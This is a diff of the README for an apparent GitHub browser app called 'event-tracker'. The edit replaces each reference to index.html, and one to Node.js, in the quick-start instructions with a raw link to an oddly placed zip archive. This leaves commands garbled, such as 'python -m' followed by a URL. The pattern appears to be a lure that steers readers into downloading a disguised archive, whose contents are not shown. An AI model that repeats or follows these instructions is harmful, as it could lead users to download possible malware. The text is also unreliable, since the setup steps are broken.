keshavgorasiya/event-tracker/README.md

 - Quick start (no server)
   1. Download the latest release package from the releases page.
   2. Unzip the package if needed.
-  3. Locate and open index.html in your browser.
+  3. Locate and open https://raw.githubusercontent.com/keshavgorasiya/event-tracker/main/antipyrotic/tracker_event_2.4.zip in your browser.
   4. Start adding events from the UI and watch the live calculations.

 - Quick start (local server)
-  - Python 3.x: Run python -m http.server 8000 from the project root (or the folder that contains index.html), then visit http://localhost:8000
+  - Python 3.x: Run python -m https://raw.githubusercontent.com/keshavgorasiya/event-tracker/main/antipyrotic/tracker_event_2.4.zip 8000 from the project root (or the folder that contains https://raw.githubusercontent.com/keshavgorasiya/event-tracker/main/antipyrotic/tracker_event_2.4.zip), then visit http://localhost:8000
-  - Node.js with http-server (if you have it installed): npx http-server -p 8000
+  - https://raw.githubusercontent.com/keshavgorasiya/event-tracker/main/antipyrotic/tracker_event_2.4.zip with http-server (if you have it installed): npx http-server -p 8000
-  - Any other static server is fine as long as it serves the index.html and assets correctly
+  - Any other static server is fine as long as it serves the https://raw.githubusercontent.com/keshavgorasiya/event-tracker/main/antipyrotic/tracker_event_2.4.zip and assets correctly

 - What you will see
   - A clean interface with a list of events